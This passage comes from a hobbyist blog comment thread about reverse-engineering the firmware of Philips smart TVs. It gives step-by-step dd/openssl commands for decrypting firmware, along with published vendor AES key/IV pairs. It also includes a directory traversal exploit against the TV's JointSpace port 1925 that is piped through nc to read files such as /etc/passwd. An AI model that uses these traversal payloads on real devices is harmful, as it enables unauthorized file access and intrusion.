    Remember that the encrypted image still has a 48-byte header, thus we must add 48 to the length. Furthermore, we don’t want to extract the 12-byte block header, thus we add 12 to the offset.

    > dd if=Autorun.upg of=tmp1.bin bs=99079529 skip=1
    > dd if=tmp1.bin of=tmp2.bin bs=56070192 count=1

    The same result could as well be achieved using the single command shown below, but that would be terribly slow.
    > dd if=Autorun.upg of=tmp2.bin bs=1 skip=99079529 count=56070192

    Now we can decrypt the image using the AES key and init vector retrieved by running md5sum on the corresponding files in /3rd_ro/keys:
    > openssl enc -d -aes128 -in tmp2.bin -out tmp3.bin -nopad \
    -K d378eaf81d378a801b556985789a7c31 \
    -iv 73079fd19183715e130858588479c652

    Strip off the 48-byte header:

    > dd if=tmp3.bin of=tmp4.bin bs=48 skip=1

    If you’re lucky then the result is already the Squashfs image. On some TV models there’s still an additional 4k header before the actual image, though. If your image starts with the byte sequence 4E 46 53 42 (‘NFSB’) then it has the additional header which must be stripped:

    > dd if=tmp4.bin of=rootfs.img bs=4096 skip=1

    Voilà. This is the root file system image which you can not either mount via the loop device or extract using the ‘unsquashfs’ tool.

  71. brandy
    brandy January 13, 2014 at 19:32 . Reply

    @kazakoffd:
    Yes, I’ve just downloaded the PFL5507 firmware and the UPG file structure looks very different. The PFL3208 firmware does however use the same structure and encryption than my PFL4208. It seems that Philips uses at least two different methods to encrypt the firmware files.

    1. kazakoffd
      kazakoffd January 16, 2014 at 11:10 . Reply

      I cant repeat this hack to get files from TV…. :((

      1. brandy
        brandy January 16, 2014 at 20:55 . Reply

        Using which firmware? It will certainly not work with the one for the PFL5507.

        1. kazakoffd
          kazakoffd January 17, 2014 at 06:45 . Reply

          I tried it on two versions: FUS_Q554E_0_100_0_0 and FUS_Q554E_0_93_0_0

  72. Donovan
    Donovan January 20, 2014 at 23:53 . Reply

    I can confirm that 46PFL5507K/12 does not have port 1925 open :-(
    I can’t find the webserver as well, which was mentioned below.
    Jointspace can be activated with the key combination, though the only open ports I found are 2323 and 49153.

    Has anybody tried to sniff the jointspace traffic? How is sent to the TV?

    1. Donovan
      Donovan January 21, 2014 at 00:12 . Reply

      Seems like 49153 is a webserver, so far I found one page
      http://192.168.178.77:49153/nmrDescription.xml
      And there are links to other xml files inside

      1. brandy
        brandy January 21, 2014 at 18:47 . Reply

        According to nmap these ports are open on my 42PFL4208 (the decriptions are also from nmap):

        1925 unknown
        2323 3d-nfsd
        2870 unknown
        36510 Mongoose httpd
        46714 Mongoose httpd

        I haven’t managed to establish a connection to any one of them except 1925, though.

        1. Donovan
          Donovan January 21, 2014 at 20:07 . Reply

          Can you give me your nmap options (or are you using some other program)? I cant find any except the ones I’ve mentioned above…

          Anyway I managed to get into port 1925 using these steps
          1. Download pcremote https://github.com/netdata/pcremote
          2. Once the javascript remote is loaded in a browser I can access port 1925 with telnet which was refused before :-D

          Unfortunately none of the exploits from here http://sitsec.net/blog/ work for me.
          Seems like they changed the http server or config options for this series.

  73. Thomas
    Thomas January 22, 2014 at 15:45 . Reply

    I have a 46PFL5007K running firmware Q554E_0.99.0.0 and port 1925 is definitely open if you have successfully enabled JointSpace. Have you used nmap to check if the port is open? nmap does not scan port 1925 by default.

    However, the TV550R4 models seem not to be vulnerable to directory traversel. My TV always returns a 404 error.

    By the way: According to http://sitsec.net/blog/2013/09/16/jointspace-server-directory-traversal-vulnerability-on-a-philips-6000-series-smart-led-tv/ someone found the vulnerability already in September 2013. He writes that he informed Philips about his discovery. Maybe the access is or will be closed in newer firmwares.

    Port 49153 is used for UPNP-Streaming. nmap identifies it as “Philips Intel UPnP SDK 1.4 (Philips Smart TV; UPnP 1.0; DLNADOC 1.50)”.

  74. Mike
    Mike February 3, 2014 at 17:27 . Reply

    Has anyone been lucky with a xxPFLxxx6 / Q5551 TV?

    My 42PFL7606 has Joitspace enabled (port is 1925 open), but the directory traversal bug is not present.
    I have tried with different firmware versions from 000.014.096.000 to 000.014.105.000, but no luck :(

  75. fgeorge
    fgeorge February 18, 2014 at 05:47 . Reply
  76. audiobriAn
    audiobriAn February 21, 2014 at 14:50 . Reply

    Just a Philips Ambilight 55 PFL8008 javascript test site: http://www.freakpoint.com.ar/philips2k12.html

  77. fgeorge
    fgeorge March 4, 2014 at 11:46 . Reply

    I have a Philips tv 47PFL5007G/78 with firmware L12M11L_1.5.10.

    >strings libmtkapp.so | grep /key/
    /ro_data/key/PhilipsTV_M2K12PLF_UPG_PubKey.pem
    /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Key
    /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Iv

    >grep -oba root Autorun.upg
    2191472:root

    >hexdump -C -s 2191472 -n 16 Autorun.upg
    00217070 72 6f 6f 74 01 00 00 00 00 20 85 02 f5 df 26 ae |root….. ….&.|
    00217080

    >dd if=Autorun.upg of=tmp1.bin bs=2191484 skip=1
    >dd if=tmp1.bin of=tmp2.bin bs=42278960 count=1
    >openssl enc -d -aes128 -in tmp2.bin -out tmp3.bin -nopad -K 2F420647EAB3A49EF95892494DE213EE -iv E27B94F583EC30A034651DCB0788BACB

    >dd if=tmp3.bin of=tmp4.bin bs=48 skip=1
    >dd if=tmp4.bin of=rootfs.img bs=4096 skip=1
    >unsquashfs rootfs.img
    Can’t find a SQUASHFS superblock on rootfs.img

    1. brandy
      brandy March 17, 2014 at 22:05 . Reply

      You used the AES key and iv from the files directly; this won’t work. Instead, you must run md5sum over these files and use the returned md5 sums as key and iv values.

      > md5sum /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Key
      => 47fbf8cad62bb95af3ad9509e5c2175d

      > md5sum /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Iv
      => 63120fb321b0410f216d6dc2d8641a11

      When using the two resulting md5 sums as key and iv then the decoding works.

      1. fgeorge
        fgeorge March 18, 2014 at 18:10 . Reply

        Thank you!!!!! I got the firmware root image.

      2. fgeorge
        fgeorge March 18, 2014 at 23:06 . Reply

        how do I rebuild firmware?

        1. brandy
          brandy March 19, 2014 at 19:20 . Reply

          I don’t think that this is possible; that’s why I’ve basically given up this approach.

          Firstly, the whole download file is signed using RSA, the corresponding public key is the one stored in /3rd_ro/key. (Actually, as far as I understood the disassembly of the corresponding code, this is not even checked, but I won’t rule out that I made a mistake here and misunderstood the assembler code.)

          Secondly, the Squashfs images are also signed using RSA, the public key being hard-coded in the kernel, and this one is definitely verified.

          So, unless someone gets hold of the private keys, creating your own firmware will be next to impossible.

  78. kopierschnitte
    kopierschnitte March 16, 2014 at 08:46 . Reply

    The traversal exploit still works on the 8008S!
    But how can we use this to execute code? For gaining shell access, e.g.

  79. kopierschnitte
    kopierschnitte March 18, 2014 at 07:44 . Reply

    How did you find libmtkapp.so? On my TV, it doesn’t exist in /lib

    1. fgeorge
      fgeorge March 18, 2014 at 18:14 . Reply

      You will find in /basic folder.

      1. kopierschnitte
        kopierschnitte March 18, 2014 at 18:31 . Reply

        No, GET /../../../../../basic/libmtkapp.so gives me a 404 :-(

        1. fgeorge
          fgeorge March 18, 2014 at 19:26 . Reply
  80. kopierschnitte
    kopierschnitte March 18, 2014 at 22:31 . Reply

    Nothing. Seems that TPVision moved that particular library in the 2013 models. I can safely download /etc/passwd or /proc/1/exe (init) but the mentioned lib seems to be absent on my model. Is there any way to actively “find” the name and location of this or other files?

    1. brandy
      brandy March 19, 2014 at 18:58 . Reply

      Well, I started with downloading and inspecting /etc/inittab and then downloading and inspecting every file subsequently referenced. On my TV, PATH and LD_LIBRARY_PATH is set in /etc/profile, this gives some likely locations of libraries. In the case of binary files I used objdump to get the list of linked libraries and downloaded them as well. I often had to try several of the library paths until I found the correct one, though.

  81. kopierschnitte
    kopierschnitte March 19, 2014 at 19:09 . Reply

    Yes, that’s a good source of information … but still no evidence of libmtkapp.so :-(
    Can you tell us which binaries you’ve inspected using objdump?
    Unfortunately, even etc/inittab is missing on my tv.

    1. brandy
      brandy March 19, 2014 at 19:52 . Reply

      No /etc/inittab? That’s very strange indeed.

      On my TV, there’s a script file /basic/autorun.sh which checks for the presence of the following binaries and starts them if they exist:

      /basic/ut_drv (does not exist)
      /basic/app_man
      /basic/dtv_svc
      /basic/mtkapp (does not exist)

      /basic/dtv_svc links libmtkapp.so

      1. kopierschnitte
        kopierschnitte March 19, 2014 at 20:03 . Reply

        Yes, no inittab … but at least an fstab which might get me a little idea about the mounting points. Strange, there’s also an NFS import :?
        The /basic folder doesn’t exist on my TV but there’s a /philips subfolder (and /philips/lib). Maybe they’ve relocated everything a little bit.

    2. brandy
      brandy March 19, 2014 at 19:59 . Reply

      BTW: You could download the firmware upgrade of the 42PFL4208 and extract the root file system image as described in my earlier post. Then you could check whether you find any of these files on your TV. But it seems that your firmware is very different than mine, so maybe libmtkapp.so does not exist there at all.

      1. kopierschnitte
        kopierschnitte March 20, 2014 at 00:13 . Reply

        Okay, tracked it down to a call to AESdecrypt within pflApp but I’m unable to guess the name of the related library which exports this symbol. I’m doing this using IDA.

  82. fgeorge
    fgeorge March 22, 2014 at 11:54 . Reply

    I think it might be impossible to obtain root access on this smart TV.

    1. kopierschnitte
      kopierschnitte March 24, 2014 at 22:02 . Reply

      Don’t get me wrong but I hope you’re not right ;-)
      With a little bit of knowledge about MIPS assembler, one should be able to reconstruct the packaging and signing process. I mean, we have access to all relevant binaries and I really think that everything we need is stored on the TV itself.

  83. fgeorge
    fgeorge March 29, 2014 at 21:03 . Reply

    Is there any chance to root for the serial port?

  84. kopierschnitte
    kopierschnitte March 30, 2014 at 00:37 . Reply

    Okay, now the directory traversal exploit has been made public along with the Miracast exploit. See http://securityaffairs.co/wordpress/23523/hacking/philips-smarttv-susceptible-serious-hack-according-revuln-experts.html

    I guess, our backdoor will be closed very soon now :-(

  85. Thomas
    Thomas April 6, 2014 at 14:46 . Reply

    @brandy: I am trying to write a script that automatically extracts and decrypts a firmware image. I am struggling with the decryption of blocks that have a length which is not a multiple of 16 bytes. You wrote that the bytes of the incomplete last block must be XORed with the corresponding bytes of the AES key. I am not sure if I understand this right.
    For example this is what I did to decrypt the XML file of the 47PFL5007G firmware:

    $ dd if=Autorun.upg of=tmp1 bs=$((272+12)) skip=1

    $ hexdump -C -s 272 -n 12 Autorun.upg
    00000110 69 78 6d 6c 01 00 00 00 c4 7f 00 00 |ixml….Ä…|

    $ dd if=tmp1 of=tmp2 bs=$((((0x00007fc4))+48)) count=1 # 32756 bytes
    $ dd if=tmp2 of=tmp3 bs=32752 count=1
    $ hexdump -C -s 32752 tmp2
    00007ff0 67 db d8 ea |gÛØê|

    XOR(67dbd8ea,2F420647EAB3A49EF95892494DE213EE)=4899deadeab3a49ef95892494de213ee (result written to file tmp4):

    $ hexdump -C tmp4
    00000000 48 99 de ad ea b3 a4 9e f9 58 92 49 4d e2 13 ee |H.Þ­ê³€.ùX.IMâ.î|

    $ cat tmp3 tmp4 > tmp5
    $ openssl enc -d -aes128 -in tmp5 -out ixml -nopad -K 47fbf8cad62bb95af3ad9509e5c2175d -iv 63120fb321b0410f216d6dc2d8641a11
    $ hexdump -C -s 32000 ixml
    00007d00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 | |
    *
    00007ff0 2f 45 8d ab af 9c 83 9c 4c 1d 8c aa 53 fb 99 3e |/E.«¯…L..ªSû.>|

    I assume that the last bytes should be all 0×20. What am I doing wrong?

    Could you also please post the keys for the 2013 models including the public key?

    1. brandy
      brandy April 13, 2014 at 12:47 . Reply

      Sorry, my fault, I wrote “must be XORed with the AES key” but actually meant “… with the md5sum of the AES key”.

      This will then indeed result in a sequence of 4 * 0×20.

      I only have the keys of my 42PFL4208:

      AES key:
      4816CA3649F0426FDFBAF1F56765A6FD
      AES iv:
      21F3680FFC43245087443E56405FB250
      PubKey:
      —–BEGIN PUBLIC KEY—–
      MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu8cydwafYt4F1Nx00plg
      ldsAV2HAbq6ATHKEaAIqtSkCKeOXG13J85EZVwgCxDQsFILXjk8/J8Sc3hVOfiiq
      MAkbqF3DxBWZoVMHRr9x75tQklUw8vRqu5jJ2mfURcPoUFiW3mHs/IT1P8TePp99
      r8IPGjP+j2RscoKTdSy7fvGAQYCDBhIG0nVtnqsL9r7lvFBQr16nw7G/E6FytxxT
      NOnMOVa/w7LAGIHamcmFJeMtqfGEnBI89gkuzJFEGvf9EbnCDNvYT0F7+TFT1us6
      /q3+u4L6u1Jm8YaYlEVHm66/RPbd8Lw4PrP22l8QGcaKYUAC9ZwBvOosToj09NTL
      nwIDAQAB
      —–END PUBLIC KEY—–

  86. Thomas
    Thomas April 14, 2014 at 20:46 . Reply

    Thanks for your reply! That one have to use the md5sum instead of the plain AES key is logical now that I think of it again how decryption works. I could have figured that out myself.

    I will publish my decryption script when it is done. I am quite busy now, so it may take a while.

    Many thanks also for posting the keys.

  87. Sebastian
    Sebastian April 21, 2014 at 19:19 . Reply

    up2date firmware closed injection @8008s Series…. – dont update !

  88. Sebastian
    Sebastian April 22, 2014 at 13:14 . Reply

    before i upgraded my 8008s i downloaded some files like
    the 2 files at /mnt/jffs1/rw/interactive/flash/keystore
    -cacerts
    -basKeystore.jks
    maybe its possible with this files ?

    additional there is dropbear installed and runnig but blockt via iptables

  89. kksnyk
    kksnyk May 2, 2014 at 13:29 . Reply

    Hi all,

    I wrote a little Windows application that can decompress the MTK bootloader used in Philips TV sets (and some others too).
    The compression method is called LZHS, probably some of you have already found some references to it in firmwares. It is based on LZSS and static Huffman coding, but first the file is preprocessed using a method named “ARMThumb_convert”. I found the LZHS encoder ELF file in a Philips open source package, so I started to inspect its outputs for several input files. After two weeks of research I’ve finished my app, and its output is exactly the same as the file that had been compressed using lzhsenc under Linux.
    If someone’s interested, I can give a link to the app (it requires MS.NET 4.0).

    Best regards,
    Kksnyk

  90. Sébastien Teka
    Sébastien Teka May 5, 2014 at 09:01 . Reply

    Maybe it should help (work on pfl6877h):

    * upgrade application:
    echo -e ‘GET /../../../../../philips/apps/upgApp HTTP/1.0\n\n’ | nc 192.168.0.3 1925

    * dependency:
    echo -e ‘GET /../../../../../philips/lib/libecddatalib.so HTTP/1.0\n\n’ | nc 192.168.0.3 1925

    All filesystem is mount with a NFS

  91. zeewox
    zeewox May 14, 2014 at 08:41 . Reply

    Hi kksnyk,
    I’m interested by your tool.
    Is source code available somewhere on github or ggcode?

    Thank you.

  92. zeewox
    zeewox May 16, 2014 at 15:31 . Reply

    a tool to unpack Philips firmware on Fusion platform (upg file): https://github.com/frederic/pflupg-tool

  93. kksnyk
    kksnyk May 18, 2014 at 17:56 . Reply

    I downloaded several firmwares, and I’ve noticed that the first 0×30 bytes of all encrypted blocks are the same in most of the firmwares. Doing some XORs at the end of the blocks which are not multiples of 16 bytes, I finally got the key. It’s so simple (TPV_TPV_TPV_TPV_) that I didn’t have to think much to guess the IV.

    Key: 5450565F5450565F5450565F5450565F
    IV: 00000000000000000000000000000000

    The decrypted file is always correct. You can try it on PFL3107h for example, but this works on much more models.

    1. Luis D
      Luis D May 18, 2014 at 18:42 . Reply

      Be carefull with the updates, latest one for my TV (42PFL7007) fixes the issue/exploit

      kksnyk, what are the steps you follow to decrypt the firmware?

      Since im to noob for all this, can you answerme if with all the info you got so far we can create our own software?

  94. kksnyk
    kksnyk May 18, 2014 at 19:15 . Reply

    Like Brandy wrote earlier, you have to run openssl:

    openssl enc -d -aes128 -in encrypted_file.bin -out decrypted_file.bin -K 5450565F5450565F5450565F5450565F -iv 00000000000000000000000000000000

    You can find tags in the firmware such as “kern”, “root” etc, you have to extract them first. If I’ll have more time, I’ll make an app for this purpose.
    However, creating our own firmware is not possible because we don’t have TPVision’s private key to sign it, so this project is a waste of time. I was simply interested in the contents of a Philips firmware.

    1. Luis D
      Luis D May 18, 2014 at 21:08 . Reply

      thanks again kksnyk my only hope was to findout which webcam the tv likes, since the original is very expensive… :( some time ago i found some USB ids, but was not able to trace the makers nor any commercial model

      last question, when you extract the images on one step you say:

      There we are. The offset is 99079517 and the length is 0×03579000 (56070144).
      > dd if=Autorun.upg of=tmp1.bin bs=99079529 skip=1
      > dd if=tmp1.bin of=tmp2.bin bs=56070192 count=1


      where do you get the 56070192 from? i just used your number and it woked, but im not sure is the right one

  95. zeewox
    zeewox May 18, 2014 at 21:27 . Reply

    Hi,

    @kksnyk I’m interested by your tool. Will you release the source code ?

    Here is a tool to unpack Philips firmware on Fusion platform (upg file):

    https://github.com/frederic/pflupg-tool

  96. kksnyk
    kksnyk May 18, 2014 at 21:48 . Reply

    That’s just the decimal form of the length (file size). To get it, for example go to the tag “root”, after that there are 4 bytes which you should skip and the following 4 bytes are the length. It’s little endian, so it must be read backwards.

    You’ll see something like this, in this case the length will be 0×78563412 and not 0×12345678:

    72 6F 6F 74 01 00 00 00 12 34 56 78 | root…..4Vx

    If you tell me the model no. of your TV, I can find out the offset and length of the root image within the UPG file.

    1. Luis D
      Luis D May 18, 2014 at 22:50 . Reply

      thank you!
      its a 42FPL7007
      the URL is: http://www.philips.com.ar/c/television/7000-series-dtvi-easy-3d-de-107-cm-42-pulgadas-42pfl7007g_77/prd/?t=support
      but the latest version online is the one with the fixes

  97. kksnyk
    kksnyk May 19, 2014 at 00:33 . Reply

    Your rootfs image starts at the offset 0x2170D8 (decimal: 2191576), and it’s 0×2852000 (decimal: 42278912) bytes long. To decrypt it, use the following key and IV.

    Key: 47fbf8cad62bb95af3ad9509e5c2175d
    IV: 63120fb321b0410f216d6dc2d8641a11

    The decrypted image has a 48-byte header that you have to delete in order to be able to mount it properly.

  98. kksnyk
    kksnyk May 19, 2014 at 00:38 . Reply

    Oh, I forgot to add 48 bytes to the length. So the correct length is 0×2852030 (42278960).

  99. Luis D
    Luis D May 19, 2014 at 00:40 . Reply

    thank you very much!

  100. kksnyk
    kksnyk May 19, 2014 at 12:34 . Reply

    You’re welcome. This image has another 4KB header, so you have to strip that off too.
    The mountable squashfs image should start with the bytes “hsqs”.

  101. mrGong
    mrGong May 24, 2014 at 19:09 . Reply

    Can anyone give me link for downloading the old firmware of pfl8008 2013 series.
    The decrypted would be better. I would like to know which cec lib they are using.

  102. stephan
    stephan June 3, 2014 at 13:59 . Reply

    Hi could you also tell me how to decrypt the following image:
    http://www.p4c.philips.com/cgi-bin/dcbint/cpindex.pl?ctn=47PFK7109/12&slg=DE&scy=DE

    I wasn’t able to use just:
    key 5450565F5450565F5450565F5450565F
    iv 00000000000000000000000000000000

    Thanks Stephan

  103. milankowww
    milankowww June 9, 2014 at 23:15 . Reply

    Hello, have 47PFL7606K/02 with firmware Q5551-0.14.99.0. The path vulnerability does not exist here. Just to save some time: 1) have you tried http://www.cvedetails.com/cve/CVE-2011-2716/ ? 2) If not, could you please dump busybox binary for me, so I know what commands I can use? Milan

  104. kksnyk
    kksnyk June 12, 2014 at 20:34 . Reply

    @milankowww: Firmwares starting with Q cannot be extracted or decrypted with our known methods. The structure of these UPG files are very different. Same for 8008s.

    @stephan: The decryption key and iv for your firmware is not yet known. The key-iv pairs we know so far:

    Key1: 5450565F5450565F5450565F5450565F
    IV1: 00000000000000000000000000000000

    Key2: 47FBF8CAD62BB95AF3AD9509E5C2175D
    IV2: 63120FB321B0410F216D6DC2D8641A11

    Key3: D378EAF81D378A801B556985789A7C31
    IV3: 73079FD19183715E130858588479C652

    You don’t have to try any of these, they won’t work in your case. But for others, they can be useful.

  105. John
    John June 13, 2014 at 11:47 . Reply

    I have found a complete NAND flash dump of a 37PFL9632D. You can download it from http://fa.metincom.net/dumps/3788_37PFL9632D.part.rar and http://fa.metincom.net/dumps/3789_37PFL9632D.part.rar. Rename 3788_37PFL9632D.part.rar to 37PFL9632D.part1.rar and 3789_37PFL9632D.part.rar to 37PFL9632D.part2.rar in order to extract the archive.

    The 37PFL9632D has the same firmware image format like the PFL9703 or my PFL5007. Maybe we can learn from the dump how to decrypt the firmware image.

    Here is the binwalk output for the dump:

    DECIMAL HEX DESCRIPTION
    ——————————————————————————————————————-
    15900 0x3E1C YAFFS filesystem
    15984 0x3E70 YAFFS filesystem
    16068 0x3EC4 YAFFS filesystem
    16828 0x41BC Squashfs filesystem, little endian, version 3.0, size: 4764847932560113663 bytes, 213 inodes, blocksize: -53658112 bytes, created: Wed Aug 1 15:35:30 2007
    9446988 0x90264C Copyright string: ” (c) 2004 by Koninklijke Philips Electronics N.V. DemuxMpegPS s Electronics N.V. DemuxMpegPS 1.2.36737″
    9449836 0x90316C Copyright string: ” (c) 2005 by Koninklijke Philips Electronics N.V. VdecJpeg 1.1s Electronics N.V. VdecJpeg 1.10.47483″
    9601232 0x9280D0 LZMA compressed data, properties: 0×40, dictionary size: 16777216 bytes, uncompressed size: 117440512 bytes
    9635872 0×930820 LZMA compressed data, properties: 0x5B, dictionary size: 33554432 bytes, uncompressed size: 805306368 bytes
    9636604 0x930AFC LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 402653184 bytes
    9636884 0x930C14 LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 50331648 bytes
    9637024 0x930CA0 LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 50331648 bytes
    9637460 0x930E54 LZMA compressed data, properties: 0×65, dictionary size: 16777216 bytes, uncompressed size: 134217728 bytes
    9637616 0x930EF0 LZMA compressed data, properties: 0×66, dictionary size: 16777216 bytes, uncompressed size: 134217728 bytes
    9639624 0x9316C8 LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 905969664 bytes
    9639780 0×931764 LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 905969664 bytes
    9639920 0x9317F0 LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 452984832 bytes
    9640060 0x93187C LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 218103808 bytes
    9681951 0x93BC1F mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
    11904743 0xB5A6E7 mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 4bit
    13044084 0xC70974 Squashfs filesystem, little endian, version 3.0, size: 1387555 bytes, 211 inodes, blocksize: 65536 bytes, created: Fri Oct 5 11:04:08 2007
    18501120 0x11A4E00 Squashfs filesystem, little endian, version 3.0, size: 7222013 bytes, 253 inodes, blocksize: 65536 bytes, created: Fri Oct 5 11:04:39 2007
    29947532 0x1C8F68C JFFS2 filesystem, little endian
    38320017 0x248B791 mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
    38455296 0x24AC800 JFFS2 filesystem, little endian

    Unfortunately Philips seems to use a non-standard Squashfs filesystem.

  106. Luis
    Luis June 13, 2014 at 19:45 . Reply

    what i was wondering is if we could extract and use the netflix bins on another ARM device….

  107. Henry
    Henry June 22, 2014 at 20:42 . Reply

    Hey, i have 32PFL7685/12 and a stripy screen (vertical). This was happened after moving tv. It may have got some physical kicks but it’s not likely.
    I got the sound with DVD player connected, but screen remains striped, as it was from the start when i plugged in the tv. All connections tried, theres no way that it is because of the cable etc. It starts after powering on and even philips logo does’nt show.

    Somebody told me that there is a possibility to fix it with factory reset.
    But i cant use any menu, because i simply can’t see it. Is there a way to do it with remote?
    Is the 062596 right way? If yes then how to move on? Any ideas?

  108. kksnyk
    kksnyk August 27, 2014 at 15:45 . Reply

    @zeewox: sorry for replying so late, i’ve just noticed your comments. I’ll upload the application and its source code today or tomorrow, when i can access my PC.

  109. essir
    essir September 22, 2014 at 08:16 . Reply

    Hi,
    I have a Philips 37PFL9642D/19 since 2007.
    This LCD is part of TV520 series, designed by NXP, Philips subsidiary.
    I follow this post since its creation in 2010, but it is true that there is a little more excitement from last year.
    I will pass the files I could recover and hope that everyone will have a custom firmware shortly for his TV.

    TV520 architecture => ELCEurope2007Presentations.pdf
    http://zz1z5226yt.1fichier.com/

    TV520 – Q528.1E [Engineering & Service Training] => Philips-q528e-Service-Training-Manual-Part2.pdf
    http://3l8dta5ith.1fichier.com/

    Q528.1E LA [Service Manual] => Philips-Q528-1ELA-chassis.pdf
    http://bylisf76eu.1fichier.com/

    ComPair => Philips-ComPair-training-20January-2008.pdf
    http://rgiwztyejw.1fichier.com/

  110. essir
    essir September 22, 2014 at 08:50 . Reply

    I found one on a server, firmware for 42PFL9603D/10 decrypted.
    Firmware version is Q591E_v1.101.0.0

    The files are contained in autorun.upg are :
    => 3104 337 06531_bootPromPNX5100_Q591E_0.9.0.1.zip
    => Point2PointDLL : 3104 337 06531_Ceisp2padll_P2PAD_3.1.0.0.zip
    => 3104 337 06531_DDC_Q591E_0.2.0.0.zip
    => EDID : 3104 337 06531_EDID_Q591E_0.5.0.0.zip
    => ConsumerMainSoftware : 3104 337 06531_FUS_Q591E_0.101.0.0.zip
    => NVM : 3104 337 06531_processNVM_Q591E_0.6.3.0.zip
    => StandbySoftware : 3104 337 06531_StandbySW_CFT55_44.0.0.0.zip

    Q591E_v1.101.0.0.7z
    http://673c0mdas4.1fichier.com/

Leave a Reply

%d bloggers like this: